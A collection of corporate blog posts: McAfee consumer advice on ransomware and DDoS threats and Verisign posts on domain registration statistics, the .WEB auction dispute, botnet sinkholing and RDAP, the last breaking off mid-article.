According to to ZDNet, the five most active ransomware groups targeting K-12 schools are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil. Furthermore, all five of these ransomware families are known to run “leak sites,” where they dump data from victims who don’t pay the ransom. This creates a particularly dangerous problem of having student data published online. To prevent distance learning disruption, students and educators need to understand the effects of ransomware on school systems and take steps to prevent the damage caused by this threat.

DDoS Attacks Disrupt the Distance Learning

An increase in ransomware attacks isn’t the only problem that K-12 schools are facing. The CISA and the FBI warned those participating in distance learning to protect themselves against other forms of cyberattacks such as Distributed Denial of Service (DDoS). DDoS is a method where hackers flood a network with so much traffic that it cannot operate or communicate as it normally would.

According to Dark Reading, Miami-Dade County Public Schools experienced significant disruptions during their first three days of distance learning for the 2020-2021 school year, thanks to a series of DDoS attacks. The school system stated it had already experienced more than a dozen DDoS attacks since the start of the school year. Sandwich Public Schools in Massachusetts were also knocked offline by a DDoS attack. When school systems fall victim to DDoS attacks, students can lose access to essential documents, files, or online platforms that they need to complete assignments. And with many students relying heavily on distance learning systems, losing access could put them behind.

Delete Disruptions: Follow These Security Tips

In an effort to create a standardized framework for dealing with ransomware attacks across verticals – including education – McAfee has teamed up with Microsoft to lead the Ransomware Task Force, along with 17 other security firms, tech companies, and non-profits. And while we’re taking critical actions to decrease the threat of ransomware attacks, there are other steps you can take to prevent ransomware and DDoS attacks from interrupting your distance learning experience. Follow these tips to take charge of your education and live your digital life free from worry:

Don’t pay the ransom

Many ransom notes seem convincing, and many only request small, seemingly doable amounts of money. Nevertheless, you should never pay the ransom. Paying does not promise you’ll get your information back, and many victims often don’t. So, no matter how desperate you are for your files, hold off on paying up.

Do a complete backup 

With ransomware attacks locking away crucial data, it’s important to back up your files on all your machines. If a device becomes infected with ransomware, there’s no promise you’ll get that data back. Ensure you cover all your bases and have your data stored on an external hard drive or in the cloud.

Use decryption tools

No More Ransom – an initiative that teams up security firms, including McAfee, and law enforcement – provides tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then, check out No More Ransom’s decryption tools and see if one is available for your specific strain.

Secure your router

Your Wi-Fi router is the gateway to your network. Secure it by changing the default password. If you aren’t sure how to do this, consult the internet for instructions on how to do it for your specific make and model, or call the manufacturer. Solutions like McAfee Secure Home Platform, which is embedded within select routers, can help you easily manage and protect your network from DDoS attacks and more.

Change default passwords on IoT devices

A lot of internet of things (IoT) devices come with default usernames and passwords. After taking your IoT device out of the box, the first thing you should do is change those default credentials. If you’re unsure of how to change the default setting on your IoT device, refer to setup instructions or do a bit of research online.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021 appeared first on McAfee Blogs.

Verisign Q4 2020 Domain Name Industry Brief: 366.3 Million Domain Name Registrations in the Fourth Quarter of 2020

Today, we released the latest issue of the Domain Name Industry Brief, which shows that the fourth quarter of 2020 closed with 366.3 million domain name registrations across all top-level domains (TLDs), a decrease of 4.4 million domain name registrations, or 1.2 percent, compared to the third quarter of 2020.^1,2 Domain name registrations have grown by 4.0 million, or 1.1 percent, year over year.^1,2

Check out the latest issue of the Domain Name Industry Brief to see domain name stats from the fourth quarter of 2020, including:

• Top 10 Largest TLDs by Number of Reported Domain Names
• Top 10 Largest ccTLDs by Number of Reported Domain Names
• New gTLDs as Percentage of Total TLDs
• Geographical ngTLDs as Percentage of Total Corresponding Geographical TLDs

This quarter’s Domain Name Industry Brief also includes a closer look at encryption and what new DNS capabilities may be possible with a “minimize at the root and top-level domain, encrypt when needed elsewhere” approach to DNS encryption.

To see past issues of the Domain Name Industry Brief, please visit Verisign.com/DNIBArchives.

---

<sup>1. The figure(s) includes domain names in the .tk ccTLD. .tk is a ccTLD that provides free domain names to individuals and businesses. Revenue is generated by monetizing expired domain names. Domain names no longer in use by the registrant or expired are taken back by the registry and the residual traffic is sold to advertising networks. As such, there are no deleted .tk domain names. https://www.businesswire.com/news/home/20131216006048/en/Freenom-Closes-3M-Series-Funding#.UxeUGNJDv9s.

2. The generic top-level domain (gTLD), new gTLD (ngTLD) and ccTLD data cited in the brief: (i) includes ccTLD Internationalized Domain Names (IDNs), (ii) is an estimate as of the time this brief was developed and (iii) is subject to change as more complete data is received. Some numbers in the brief may reflect standard rounding.</sup>

The post Verisign Q4 2020 Domain Name Industry Brief: 366.3 Million Domain Name Registrations in the Fourth Quarter of 2020 appeared first on Verisign Blog.

What Is a DDoS Attack and How to Stay Safe from Malicious Traffic Schemes

What Is a DDoS Attack and How to Stay Safe from Malicious Traffic Schemes

Imagine you’re driving down a highway to get to work. There are other cars on the road, but by and large everyone is moving smoothly at a crisp, legal speed limit. Then, as you approach an entry ramp, more cars join. And then more, and more, and more until all of the sudden traffic has slowed to a crawl. This illustrates a DDoS attack.

DDoS stands for Distributed Denial of Service, and it’s a method where cybercriminals flood a network with so much malicious traffic that it cannot operate or communicate as it normally would. This causes the site’s normal traffic, also known as legitimate packets, to come to a halt. DDoS is a simple, effective and powerful technique that’s fueled by insecure devices and poor digital habits. Luckily, with a few easy tweaks to your everyday habits, you can safeguard your personal devices against DDoS attacks.

DDoS Attacks Are on the Rise

The expansion of 5G, proliferation of IoT and smart devices, and shift of more industries moving their operations online have presented new opportunities for DDoS attacks. Cybercriminals are taking advantage, and 2020 saw two of the largest DDoS offensives ever recorded. In 2020, ambitious attacks were launched on Amazon and Google. There is no target too big for cybercriminals.

DDoS attacks are one of the more troubling areas in cybersecurity, because they’re incredibly difficult to prevent and mitigate.. Preventing these attacks is particularly difficult because malicious traffic isn’t coming from a single source. There are an estimated 12.5 million devices that are vulnerable to being recruited by a DDoS attacker.

Personal Devices Become DDoS Attack Soldiers

DDoS attacks are fairly simple to create. All it takes are two devices that coordinate to send fake traffic to a server or website. That’s it. Your laptop and your phone, for example, could be programmed to form their own DDoS network (sometimes referred to as a botnet, more below). However, even if two devices dedicate all of their processing power in an attack, it still isn’t enough to take down a website or server. Hundreds and thousands of coordinated devices are required to take down an entire service provider.

To amass a network of that size, cybercriminals create what’s known as a “botnet,” a network of compromised devices that coordinate to achieve a particular task. Botnets don’t always have to be used in a DDoS attack, nor does a DDoS have to have a botnet to work, but more often than not they go together like Bonnie and Clyde. Cybercriminals create botnets through fairly typical means: tricking people into downloading malicious files and spreading malware.

But malware isn’t the only means of recruiting devices. Because a good deal of companies and consumers practice poor password habits, malicious actors can scan the internet for connected devices with known factory credentials or easy-to-guess passwords (“password,” for example). Once logged in, cybercriminals can easily infect and recruit the device into their cyber army.

Why DDoS Launches Are Often Successful

These recruited cyber armies can lie dormant until they’re given orders. This is where a specialized server called a command and control server (typically abbreviated as a “C2”) comes into play. When instructed, cybercriminals will order a C2 server to issue instructions to compromised devices. Those devices will then use a portion of their processing power to send fake traffic to a targeted server or website and, voila! That’s how a DDoS attack is launched.

DDoS attacks are usually successful because of their distributed nature, and the difficulty in discerning between legitimate users and fake traffic. They do not, however, constitute a breach. This is because DDoS attacks overwhelm a target to knock it offline — not to steal from it. Usually DDoS attacks will be deployed as a means of retaliation against a company or service, often for political reasons. Sometimes, however, cybercriminals will use DDoS attacks as a smokescreen for more serious compromises that may eventually lead to a full-blown breach.

3 Ways to Prevent Your Devices from Being Recruited

DDoS attacks are only possible because devices can be easily compromised. Here are three ways you can prevent your devices from participating in a DDoS attack:

1. Secure your router: Your Wi-Fi router is the gateway to your network. Secure it by changing the default password. If you’ve already thrown out the instructions for your router and aren’t sure how to do this, consult the internet for instructions on how to do it for your specific make and model, or call the manufacturer. And remember, protection can start within your router, too. Solutions such as McAfee Secure Home Platform, which is embedded within select routers, help you easily manage and protect your network.
2. Change default passwords on IoT devices: Many Internet of Things (IoT) devices, smart objects that connect to the internet for increased functionality and efficiency, come with default usernames and passwords. The very first thing you should do after taking your IoT device out of the box is change those default credentials. If you’re unsure of how to change the default setting on your IoT device, refer to setup instructions or do a bit of research online.
3. Use comprehensive security: Many botnets are coordinated on devices without any built-in security. Comprehensive security solutions, like McAfee Total Protection, can help secure your most important digital devices from known malware variants. If you don’t have a security suite protecting your devices, take the time to do your research and commit to a solution you trust.

Now that you know what a DDoS attack is and how to protect against it, you’re better equipped to keep your personal devices and safe and secure.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, subscribe to our email, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post What Is a DDoS Attack and How to Stay Safe from Malicious Traffic Schemes appeared first on McAfee Blogs.

Verisign Support for AAPI Communities and COVID Relief in India

At Verisign we have a commitment to making a positive and lasting impact on the global internet community, and on the communities in which we live and work.

This commitment guided our initial efforts to help these communities respond to and recover from the effects of the COVID-19 pandemic, over a year ago. And at the end of 2020, our sense of partnership with our local communities helped shape our efforts to alleviate COVID-related food insecurity in the areas where we have our most substantial footprint. This same sense of community is reflected in our partnership with Virginia Ready, which aims to help individuals in our home State of Virginia access training and certification to pivot to new careers in the technology sector.

We also believe that our team is one of our most important assets. We particularly value the diverse origins of our people; we have colleagues from all over the world who, in turn, are closely connected to their own communities both in the United States and elsewhere. A significant proportion of our staff are of either Asian American and Pacific Islander (AAPI) or South Asian origin, and today we are pleased to announce two charitable contributions, via our Verisign Cares program, directly related to these two communities.

First, Verisign is pleased to associate ourselves with the Stand with Asian Americans initiative, launched by AAPI business leaders in response to recent and upsetting episodes of aggression toward their community. Verisign supports this initiative and the pledge for which it stands, and has made a substantial contribution to the initiative’s partner, the Asian Pacific Fund, to help uplift the AAPI community.

Second, and after consultation with our staff, we have directed significant charitable contributions to organizations helping to fight the worsening wave of COVID-19 in India. Through Direct Relief we will be helping to provide oxygen and other medical equipment to hospitals, while through GiveIndia we will be supporting families in India impacted by COVID-19.

The ‘extended Verisign family’ of our employees, and their families and their communities, means a tremendous amount to us – it is only thanks to our talented and dedicated people that we are able to continue to fulfill our mission of enabling the world to connect online with reliability and confidence, anytime, anywhere.

Verisign expands its community support initiatives, with contributions to COVID-19 relief in India and to the Stand with Asian Americans initiative.

The post Verisign Support for AAPI Communities and COVID Relief in India appeared first on Verisign Blog.

IRP Panel Dismisses Afilias’ Claims to Reverse .WEB Auction and Award .WEB to Afilias

On Thursday, May 20, a final decision was issued in the Independent Review Process (IRP) brought by Afilias against the Internet Corporation for Assigned Names and Numbers (ICANN), rejecting Afilias’ petition to nullify the results of the July 27, 2016 public auction for the .WEB new generic top level domain (gTLD) and to award .WEB to Afilias at a substantially lower, non-competitive price. Nu Dotco, LLC (NDC) submitted the highest bid at the auction and was declared the winner, over Afilias’ lower, losing bid. Despite Afilias’ repeated objections to participation by NDC or Verisign in the IRP, the Panel ordered that NDC and Verisign could participate in the IRP in a limited way each as amicus curiae.

Consistent with NDC, Verisign and ICANN’s position in the IRP, the Order dismisses “the Claimant’s [Afilias’] request that Respondent [ICANN] be ordered by the Panel to disqualify NDC’s bid for .WEB, proceed with contracting the Registry Agreement for .WEB with the Claimant in accordance with the New gTLD Program Rules, and specify the bid price to be paid by the Claimant.” Contrary to Afilias’ position, all objections to the auction are referred to ICANN for determination. This includes Afilias’ objections as well as objections by NDC that Afilias violated the auction rules by engaging in secret discussions during the Blackout Period under the Program Rules.

The Order Dismisses All of Afilias’ Claims of Violations by NDC or Verisign

Afilias’ claims for relief were based on its allegation that NDC violated the New gTLD Program Rules by entering into an agreement with Verisign, under which Verisign provided funds for NDC’s participation in the .WEB auction in exchange for NDC’s commitment, if it prevailed at the auction and entered into a registry agreement with ICANN, to assign its .WEB registry agreement to Verisign upon ICANN’s consent to the assignment. As the Panel determined, the relief requested by Afilias far exceeded the scope of proper IRP relief provided for in ICANN’s Bylaws, which limit an IRP to a determination whether or not ICANN has exceeded its mission or otherwise failed to comply with its Articles of Incorporation and Bylaws.

Issued two and a half years after Afilias initiated its IRP, the Panel’s decision unequivocally rejects Afilias’ attempt to misuse the IRP to rule on claims of NDC or Verisign misconduct or obtain the .WEB gTLD for itself despite its losing bid. The Panel held that it is for ICANN, which has the requisite knowledge, expertise, and experience, to determine whether NDC’s contract with Verisign violated ICANN’s Program Rules. The Panel further determined that it would be improper for the Panel to dictate what should be the consequences of an alleged violation of the rules contained in the gTLD Applicant Guidebook, if any took place. The Panel therefore denied Afilias’ requests for a binding declaration that ICANN must disqualify NDC’s bid for violating the Guidebook rules and award .WEB to Afilias.

Despite pursuing its claims in the IRP for over two years — at a cost of millions of dollars — Afilias failed to offer any evidence to support its allegations that NDC improperly failed to update its application and/or assigned its application to Verisign. Instead, the evidence was to the contrary. Indeed, Afilias failed to offer testimony from a single Afilias witness during the hearing on the merits, including witnesses with direct knowledge of relevant events and industry practices. It is apparent that Afilias failed to call as witnesses any of its own officers or employees because, testifying under penalty of perjury, they would have been forced to contradict the false allegations advanced by Afilias during the IRP. By contrast, ICANN, NDC and Verisign each supported their respective positions appropriately by calling witnesses to testify and be subject to cross-examination by the three-arbitrator panel and Afilias, under oath, with respect to the facts refuting Afilias’ claims.

Afilias also argued in the IRP that ICANN is a competition regulator and that ICANN’s commitment, contained in its Bylaws, to promote competition required ICANN to disqualify NDC’s bid for the .WEB gTLD because NDC’s contract with Verisign may lead to Verisign’s operation of .WEB. The Panel rejected Afilias’ claim, agreeing with ICANN and Verisign that “ICANN does not have the power, authority, or expertise to act as a competition regulator by challenging or policing anticompetitive transactions or conduct.” The Panel found ICANN’s evidence “compelling” that it fulfills its mission to promote competition through the expansion of the domain name space and facilitation of innovative approaches to the delivery of domain name registry services, not by acting as an antitrust regulator. The Panel quoted Afilias’ own statements to this effect, which were made outside of the IRP proceedings when Afilias had different interests.

Although the Panel rejected Afilias’ Guidebook and competition claims, it did find that the manner in which ICANN addressed complaints about the .WEB matter did not meet all of the commitments in its Bylaws. But even so, Afilias was awarded only a small portion of the legal fees it hoped to recover from ICANN.

Moving Forward with .WEB

It is now up to ICANN to move forward expeditiously to determine, consistent with its Bylaws, the validity of any objections under the New gTLD Program Rules in connection with the .WEB auction, including NDC and Verisign’s position that Afilias should be disqualified from making any further objections to NDC’s application.

As Verisign and NDC pointed out in 2016, the evidence during the IRP establishes that collusive conduct by Afilias in connection with the auction violated the Guidebook. The Guidebook and Auction Rules both prohibit applicants within a contention set from discussing “bidding strategies” or “settlement” during a designated Blackout Period in advance of an auction. Violation of the Blackout Period is a “serious violation” of ICANN’s rules and may result in forfeiture of an applicant’s application. The evidence adduced in the IRP proves that Afilias committed such violations and should be disqualified. On July 22, just four days before the public ICANN auction for .WEB, Afilias contacted NDC, following Afilias’ discussions with other applicants, to try to negotiate a private auction if ICANN would delay the public auction. Afilias knew the Blackout Period was in effect, but nonetheless violated it in an attempt to persuade NDC to participate in a private auction. Under the settlement Afilias proposed, Afilias would make millions of dollars even if it lost the auction, rather than auction proceeds being used for the internet community through the investment of such proceeds by ICANN as determined by the community.

All of the issues raised during the IRP were the subject of extensive briefing, evidentiary submissions and live testimony during the hearing on the merits, providing ICANN with a substantial record on which to render a determination with respect to .WEB and proceed forward with delegation of the new gTLD. Verisign stands ready to assist ICANN in any way we can to quickly resolve this matter so that domain names within the .WEB gTLD can finally be made available to businesses and consumers.

As a final observation: Afilias no longer operates a registry business, and has neither the platform, organization, nor necessary consents from ICANN, to support one. Inconsistent with Afilias’ claims in the IRP, Afilias transferred its entire registry business to Donuts during the pendency of the IRP. Although long in the works, the sale was not disclosed by Afilias either before or during the IRP hearings, nor, remarkably, did Afilias produce any company witness for examination who might have disclosed the sale to the panel of arbitrators or others. Based on a necessary public disclosure of the Donuts sale after the hearings and before entry of the Panel’s Order, the Panel included in its final Order a determination that it is for ICANN to determine whether the Afilias’ sale is itself a basis for a denial of Afilias’ claims with respect to .WEB.

Verisign’s analysis of the Independent Review Process decision regarding the awarding of the .web top level domain.

The post IRP Panel Dismisses Afilias’ Claims to Reverse .WEB Auction and Award .WEB to Afilias appeared first on Verisign Blog.

Verisign Q1 2021 Domain Name Industry Brief: 363.5 Million Domain Name Registrations in the First Quarter of 2021

Today, we released the latest issue of the Domain Name Industry Brief, which shows that the first quarter of 2021 closed with 363.5 million domain name registrations across all top-level domains (TLDs), a decrease of 2.8 million domain name registrations, or 0.8%, compared to the fourth quarter of 2020.^1,2 Domain name registrations have decreased by 3.3 million, or 0.9%, year over year.^1,2

Check out the latest issue of the Domain Name Industry Brief to see domain name stats from the first quarter of 2021, including:

• Top 10 Largest TLDs by Number of Reported Domain Names
• Top 10 Largest ccTLDs by Number of Reported Domain Names
• New gTLDs as Percentage of Total TLDs
• Geographical ngTLDs as Percentage of Total Corresponding Geographical TLDs

This quarter’s Domain Name Industry Brief also includes a look at a recent collaboration between Verisign, ICANN and industry partners to combat botnets.

To see past issues of the Domain Name Industry Brief, please visit verisign.com/dnibarchives.

---

^{1. The figure(s) includes domain names in the .tk ccTLD. .tk is a ccTLD that provides free domain names to individuals and businesses. Revenue is generated by monetizing expired domain names. Domain names no longer in use by the registrant or expired are taken back by the registry and the residual traffic is sold to advertising networks. As such, there are no deleted .tk domain names. https://www.businesswire.com/news/home/20131216006048/en/Freenom-Closes-3M-Series-Funding#.UxeUGNJDv9s.}

^{2. The generic top-level domain (gTLD), new gTLD (ngTLD) and ccTLD data cited in the brief: (i) includes ccTLD Internationalized Domain Names (IDNs), (ii) is an estimate as of the time this brief was developed and (iii) is subject to change as more complete data is received. Some numbers in the brief may reflect standard rounding.}

The internet had 363.5 million domain name registrations at the end of Q1 2021.

The post Verisign Q1 2021 Domain Name Industry Brief: 363.5 Million Domain Name Registrations in the First Quarter of 2021 appeared first on Verisign Blog.

Industry Insights: Verisign, ICANN and Industry Partners Collaborate to Combat Botnets

Note: This article originally appeared in Verisign’s Q1 2021 Domain Name Industry Brief.

This article expands on observations of a botnet traffic group at various levels of the Domain Name System (DNS) hierarchy, presented at DNS-OARC 35.

Addressing DNS abuse and maintaining a healthy DNS ecosystem are important components of Verisign’s commitment to being a responsible steward of the internet. We continuously engage with the Internet Corporation for Assigned Names and Numbers (ICANN) and other industry partners to help ensure the secure, stable and resilient operation of the DNS.

Based on recent telemetry data from Verisign’s authoritative top-level domain (TLD) name servers, Verisign observed a widespread botnet responsible for a disproportionate amount of total global DNS queries – and, in coordination with several registrars, registries and ICANN, acted expeditiously to remediate it.

Just prior to Verisign taking action to remediate the botnet, upwards of 27.5 billion queries per day were being sent to Verisign’s authoritative TLD name servers, accounting for roughly 10% of Verisign’s total DNS traffic. That amount of query volume in most DNS environments would be considered a sustained distributed denial-of-service (DDoS) attack.

These queries were associated with a particular piece of malware that emerged in 2018, spreading throughout the internet to create a global botnet infrastructure. Botnets provide a substrate for malicious actors to theoretically perform all manner of malicious activity – executing DDoS attacks, exfiltrating data, sending spam, conducting phishing campaigns or even installing ransomware. This is the result of the malware’s ability to download and execute any other type of payload the malicious actor desires.

Malware authors often apply various forms of evasion techniques to protect their botnets from being detected and remediated. A Domain Generation Algorithm (DGA) is an example of such an evasion technique.

DGAs are seen in various families of malware that periodically generate a number of domain names, which can be used as rendezvous points for botnet command-and-control servers. By using a DGA to build the list of domain names, the malicious actor makes it more difficult for security practitioners to identify what domain names will be used and when. Only by exhaustively reverse-engineering a piece of malware can the definitive set of domain names be ascertained.

The choices made by miscreants to tailor malware DGAs directly influences the DGAs’ ability to evade detection. For instance, electing to use more TLDs and a large number of domain names in a given time period makes the malware’s operation more difficult to disrupt; however, this approach also increases the amount of network noise, making it easier to identify anomalous traffic patterns by security and network teams. Likewise, a DGA that uses a limited number of TLDs and domain names will generate significantly less network noise but is more fragile and susceptible to remediation.

Botnets that implement DGA algorithms or utilize domain names clearly represent an “abuse of the DNS,” opposed to other types of abuse that are executed “via the DNS,” such as phishing. This is an important distinction the DNS community should consider as it continues to refine the scope of DNS abuse and how remediation of the various abuses can be effectuated.

The remediation of domain names used by botnets as rendezvous points poses numerous operational challenges and insights. The set of domain names needs to be identified and investigated to determine their current registration status. Risk assessments must be evaluated on registered domain names to determine if additional actions should be performed, such as sending registrar notifications, issuing requests to transfer domain names, adding Extensible Provisioning Protocol (EPP) hold statuses, altering delegation records, etc. There are also timing and coordination elements that must be balanced with external entities, such as ICANN, law enforcement, Computer Emergency Readiness Teams (CERTs) and contracted parties, including registrars and registries. Other technical decisions also need to be considered, designed and deployed to achieve the desired remediation goal.

After coordinating with ICANN, and several registrars and registries, Verisign registered the remaining available botnet domain names and began a three-phase plan to sinkhole those domain names. Ultimately, this remediation effort would reduce the traffic sent to Verisign authoritative name servers and effectively eliminate the botnet’s ability to use command-and-control domain names within Verisign-operated TLDs.

Figure 1 below shows the amount of botnet traffic Verisign authoritative name servers received prior to intervention, and throughout the process of registering, delegating and sinkholing the botnet domain names.

Phase one was executed on Dec. 21, 2020, in which 100 .cc domain names were configured to resolve to Verisign-operated sinkhole servers. Subsequently, traffic at Verisign authoritative name servers quickly decreased. The second group of domain names contained 500 .com and .net domain names, which were sinkholed on Jan. 7, 2021. Again, traffic volume at Verisign authoritative name servers quickly decreased. The final group of 879 .com and .net domain names were sinkholed on Jan. 13, 2021. By the end of phase three, the cumulative DNS traffic reduction surpassed 25 billion queries per day. Verisign reserved approximately 10 percent of the botnet domain names to remain on serverHold as a placebo/control-group to better understand sinkholing effects as they relate to query volume at the child and parent zones. Verisign believes that sinkholing the remaining domain names would further reduce authoritative name server traffic by an additional one billion queries.

This botnet highlights the remarkable Pareto-like distribution of DNS query traffic, in which a few thousand domain names that span namespaces containing more than 165 million domain names, demand a vastly disproportionate amount of DNS resources.

What causes the amplification of DNS traffic volume for non-existent domain names to occur at the upper levels of the DNS hierarchy? Verisign is conducting a variety of measurements on the sinkholed botnet domain names to better understand the caching behavior of the resolver population. We are observing some interesting traffic changes at the TLD and root name servers when time to live (TTL) and response codes are altered at the sinkhole servers. Stay tuned.

In addition to remediating this botnet in late 2020 and into early 2021, Verisign extended its already four-year endeavor to combat the Avalanche botnet family. Since 2016, the Avalanche botnet had been significantly impacted due to actions taken by Verisign and an international consortium of law enforcement, academic and private organizations. However, many of the underlying Avalanche-compromised machines are still not remediated, and the threat from Avalanche could increase again if additional actions are not taken. To prevent this from happening, Verisign, in coordination with ICANN and other industry partners, is using a variety of tools to ensure Avalanche command-and-control domain names cannot be used in Verisign-operated TLDs.

Botnets are a persistent issue. And as long as they exist as a threat to the security, stability and resiliency of the DNS, cross-industry coordination and collaboration will continue to lie at the core of combating them.

This piece was co-authored by Matt Thomas and Duane Wessels, distinguished engineers at Verisign.

The post Industry Insights: Verisign, ICANN and Industry Partners Collaborate to Combat Botnets appeared first on Verisign Blog.

The Test of Time at Internet Scale: Verisign’s Danny McPherson Recognized with ACM SIGCOMM Award

The global internet, from the perspective of its billions of users, has often been envisioned as a cloud — a shapeless structure that connects users to applications and to one another, with the internal details left up to the infrastructure operators inside.

From the perspective of the infrastructure operators, however, the global internet is a network of networks. It’s a complex set of connections among network operators, application platforms, content providers and other parties.

And just as the total amount of global internet traffic continues to grow, so too does the shape and structure of the internet — the internal details of the cloud — continue to evolve.

At the Association for Computing Machinery’s Special Interest Group on Data Communications (ACM SIGCOMM) conference in 2010, researchers at Arbor Networks and the University of Michigan, including Danny McPherson, now executive vice president and chief security officer at Verisign, published one of the first papers to analyze the internal structure of the internet in detail.

The study, entitled “Internet Inter-Domain Traffic,” drew from two years of measurements involving more than 200 exabytes of data.

One of the paper’s key observations was the emergence of a “global internet core” of a relatively small number of large application and content providers that had become responsible for the majority of the traffic between different parts of the internet — in contrast to the previous topology where large network operators were the primary source.

The authors’ conclusion: “we expect the trend towards internet inter-domain traffic consolidation to continue and even accelerate.”

The paper’s predictions of internet traffic and topology trends proved out over the past decade, as confirmed by one of the paper’s authors, Craig Labovitz, in a 2019 presentation that reiterated the paper’s main findings: the internet is “getting bigger by traffic volume” while also “rapidly getting smaller by concentration of content sources.”

This week, the ACM SIGCOMM 2021 conference series recognized the enduring value of the research with the prestigious Test of Time Paper Award, given to a paper that “deemed to be an outstanding paper whose contents are still a vibrant and useful contribution today.”

Internet measurement research is particularly relevant to Domain Name System (DNS) operators such as Verisign. To optimize the deployment of their services, DNS operators need to know where DNS query traffic is most likely to be exchanged in the coming years. Insights into the internal structure of the internet can help DNS operators ensure the ongoing security, stability and resiliency of their services, for the benefit both of other infrastructure operators who depend on DNS, and the billions of users who connect online every day.

Congratulations to Danny and co-authors Craig Labovitz, Scott Iekel-Johnson, Jon Oberheide and Farnam Jahanian on receiving this award, and thanks to ACM SIGCOMM for its recognition of the research. If you’re curious about what evolutionary developments Danny and others at Verisign are envisioning today about the internet of the future, subscribe to the Verisign blog, and follow us on Twitter and LinkedIn.

The post The Test of Time at Internet Scale: Verisign’s Danny McPherson Recognized with ACM SIGCOMM Award appeared first on Verisign Blog.

Verisign Q2 2021 The Domain Name Industry Brief: 367.3 Million Domain Name Registrations in the Second Quarter of 2021

Today, we released the latest issue of The Domain Name Industry Brief, which shows that the second quarter of 2021 closed with 367.3 million domain name registrations across all top-level domains (TLDs), an increase of 3.8 million domain name registrations, or 1.0%, compared to the first quarter of 2021.^1,2 Domain name registrations have decreased by 2.8 million, or 0.7%, year over year.^1,2

Check out the latest issue of The Domain Name Industry Brief to see domain name stats from the second quarter of 2021, including:

• Top 10 Largest TLDs by Number of Reported Domain Names
• Top 10 Largest ccTLDs by Number of Reported Domain Names
• New gTLDs as Percentage of Total TLDs
• Geographical ngTLDs as Percentage of Total Corresponding Geographical TLDs

This quarter’s The Domain Name Industry Brief also includes an overview of how Registration Data Access Protocol (RDAP) improves upon the legacy WHOIS protocol.

To see past issues of The Domain Name Industry Brief, please visit verisign.com/dnibarchives.

---

^{1. The figure(s) includes domain names in the .tk ccTLD. .tk is a ccTLD that provides free domain names to individuals and businesses. Revenue is generated by monetizing expired domain names. Domain names no longer in use by the registrant or expired are taken back by the registry and the residual traffic is sold to advertising networks. As such, there are no deleted .tk domain names. https://www.businesswire.com/news/home/20131216006048/en/Freenom-Closes-3M-Series-Funding#.UxeUGNJDv9s.}

^{2. The generic top-level domain (gTLD), new gTLD (ngTLD) and ccTLD data cited in the brief: (i) includes ccTLD Internationalized Domain Names (IDNs), (ii) is an estimate as of the time this brief was developed and (iii) is subject to change as more complete data is received. Some numbers in the brief may reflect standard rounding.}

The post Verisign Q2 2021 The Domain Name Industry Brief: 367.3 Million Domain Name Registrations in the Second Quarter of 2021 appeared first on Verisign Blog.

Afilias’ Rule Violations Continue to Delay .WEB

As I noted on May 26, the final decision issued on May 20 in the Independent Review Process (IRP) brought by Afilias against the Internet Corporation for Assigned Names and Numbers (ICANN) rejected Afilias’ petition to nullify the results of the public auction for .WEB, and it further rejected Afilias’ demand to have it be awarded .WEB (at a price substantially lower than the winning bid). Instead, as we urged, the IRP Panel determined that the ICANN Board should move forward with reviewing the objections made about .WEB, and to make a decision on delegation thereafter.

Afilias and its counsel both issued press releases claiming victory in an attempt to put a positive spin on the decision. In contrast to this public position, Afilias then quickly filed a 68-page application asking the Panel to reverse its decision. This application is, however, not permitted by the arbitration rules – which expressly prohibit such requests for “do overs.”

In addition to Afilias’ facially improper application, there is an even more serious instance of rule-breaking now described in a July 23 letter from Nu Dot Co (NDC) to ICANN. This letter sets out in considerable detail how Afilias engaged in prohibited conduct during the blackout period immediately before the .WEB auction in 2016, in violation of the auction rules. The letter shows how this rule violation is more than just a technicality; it was part of a broader scheme to rig the auction. The attachments to the letter shed light on how, during the blackout period, Afilias offered NDC money to stop ICANN’s public auction in favor of a private process – which would in turn deny the broader internet community the benefit of the proceeds of a public auction.

Afilias’ latest application to reverse the Panel’s decision, like its pre-auction misconduct 5 years ago, has only led to unnecessary delay of the delegation of .WEB. It is long past time for this multi-year campaign to come to an end. The Panel’s unanimous ruling makes clear that it strongly agrees.

The post Afilias’ Rule Violations Continue to Delay .WEB appeared first on Verisign Blog.

Industry Insights: RDAP Becomes Internet Standard

This article originally appeared in The Domain Name Industry Brief (Volume 18, Issue 3)

Earlier this year, the Internet Engineering Task Force’s (IETF’s) Internet Engineering Steering Group (IESG) announced that several Proposed Standards related to the Registration Data Access Protocol (RDAP), including three that I co-authored, were being promoted to the prestigious designation of Internet Standard. Initially accepted as proposed standards six years ago, RFC 7480, RFC 7481, RFC 9082 and RFC 9083 now comprise the new Standard 95. RDAP allows users to access domain registration data and could one day replace its predecessor the WHOIS protocol. RDAP is designed to address some widely recognized deficiencies in the WHOIS protocol and can help improve the registration data chain of custody.

In the discussion that follows, I’ll look back at the registry data model, given the evolution from WHOIS to the RDAP protocol, and examine how the RDAP protocol can help improve upon the more traditional, WHOIS-based registry models.

Registration Data Directory Services Evolution, Part 1: The WHOIS Protocol

In 1998, Network Solutions was responsible for providing both consumer-facing registrar and back-end registry functions for the legacy .com, .net and .org generic top-level domains (gTLDs). Network Solutions collected information from domain name registrants, used that information to process domain name registration requests, and published both collected data and data derived from processing registration requests (such as expiration dates and status values) in a public-facing directory service known as WHOIS.

From Network Solution’s perspective as the registry, the chain of custody for domain name registration data involved only two parties: the registrant (or their agent) and Network Solutions. With the introduction of a Shared Registration System (SRS) in 1999, multiple registrars began to compete for domain name registration business by using the registry services operated by Network Solutions. The introduction of additional registrars and the separation of registry and registrar functions added parties to the chain of custody of domain name registration data. Information flowed from the registrant, to the registrar, and then to the registry, typically crossing multiple networks and jurisdictions, as depicted in Figure 1.

Registration Data Directory Services Evolution, Part 2: The RDAP Protocol

Over time, new gTLDs and new registries came into existence, new WHOIS services (with different output formats) were launched, and countries adopted new laws and regulations focused on protecting the personal information associated with domain name registration data. As time progressed, it became clear that WHOIS lacked several needed features, such as:

• Standardized command structures
• Output and error structures
• Support for internationalization and localization
• User identification
• Authentication and access control

